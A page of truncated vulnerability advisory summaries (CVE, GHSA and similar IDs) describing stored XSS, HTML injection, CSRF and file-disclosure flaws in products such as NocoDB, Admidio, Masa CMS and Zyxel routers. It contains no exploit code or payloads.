CVE-2026-45231

DumbAssets 1.0.11 is affected by a stored XSS vulnerability in asset fields (name, description, modelNumber, serialNumber, tags) that are stored without server-side sanitization and rendered via innerHTML without client-side escaping. An attacker can create or update assets through asset API endp...

CVE-2026-32757

Admidio is an open-source user management solution. In versions 5.0.6 and below, the eCard send handler uses a raw $POST'ecardmessage' value instead of the HTMLPurifier-sanitized $formValues'ecardmessage' when constructing the greeting card HTML. This allows an authenticated attacker to inject...

CVE-2026-32757

Admidio eCard HTML email injection vulnerability (CVE-2026-32757) arises from using the raw POST message instead of the HTMLPurifier-sanitized value when constructing the eCard HTML. The sanitize step runs during form validation but the sanitized value is never used; the template then embeds the ...

GHSA-8VM4-G489-V3W7 NocoDB Vulnerable to Stored Cross-Site Scripting via Comments and Rich Text Cells

Summary User-controlled content in comments and rich text cells was rendered via v-html without sanitization, enabling stored XSS. Details Comments in Comments.vue and rich text in TextArea.vue were parsed by markdown-it with html: true and injected via v-html. The codebase had vue-dompurify-html...

GHSA-QXWQ-Q265-HC44 NocoDB Vulnerable to Stored Cross-site Scripting via Rich Text Field

Summary An authenticated user with Editor role can inject arbitrary HTML into Rich Text cells by bypassing the TipTap editor and sending raw HTML via the API. Details The TipTap editor sanitizes HTML client-side, but the backend stores raw HTML without server-side sanitization. The stored content...

CVE-2026-1011

A stored cross-site scripting XSS vulnerability exists in the Altium Support Center AddComment endpoint due to missing server-side input sanitization. Although the client interface applies HTML escaping, the backend accepts and stores arbitrary HTML and JavaScript supplied via modified POST...

EUVD-2025-203028

Masa CMS is an open source Enterprise Content Management platform. Versions 7.2.8 and below, 7.3.1 through 7.3.13, 7.4.0-alpha.1 through 7.4.8 and 7.5.0 through 7.5.1 are vulnerable to XSS when an unsanitized value of the ajax URL query parameter is directly included within the section of the HTM...

CVE-2025-66492 Masa CMS vulnerable to Cross-Site Scripting (XSS) through URL Parameter

Masa CMS is an open source Enterprise Content Management platform. Versions 7.2.8 and below, 7.3.1 through 7.3.13, 7.4.0-alpha.1 through 7.4.8 and 7.5.0 through 7.5.1 are vulnerable to XSS when an unsanitized value of the ajax URL query parameter is directly included within the section of the HTM...

PT-2025-50881

Name of the Vulnerable Software and Affected Versions Masa CMS versions 7.2.8 and below Masa CMS versions 7.3.1 through 7.3.13 Masa CMS versions 7.4.0-alpha.1 through 7.4.8 Masa CMS versions 7.5.0 through 7.5.1 Description Masa CMS, an open source Enterprise Content Management platform, is...

Zyxel Nbg6816和Zyxel Nbg6817 跨站请求伪造漏洞

The Zyxel Nbg6816 and Zyxel Nbg6817 are both products of China's Hopkins Technology Zyxel.The Zyxel Nbg6816 is a dual-band wireless gigabit router.The Zyxel Nbg6817 is a wireless router. The Zyxel Nbg6816 and Zyxel Nbg6817 suffer from a cross-site request forgery vulnerability that stems from...

CVE-2018-8606

A cross site scripting vulnerability exists when Microsoft Dynamics 365 on-premises version 8 does not properly sanitize a specially crafted web request to an affected Dynamics server, aka "Microsoft Dynamics 365 on-premises version 8 Cross Site Scripting Vulnerability." This affects Microsoft...

Simple Web Server 0.5.1 File Disclosure Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/6145/info Simple Web Server does not properly sanitize web requests. By adding a slash-slash sequence '//' to a URI, it is possible for an attacker to disclose files on the vulnerable web server, effectively bypassing any...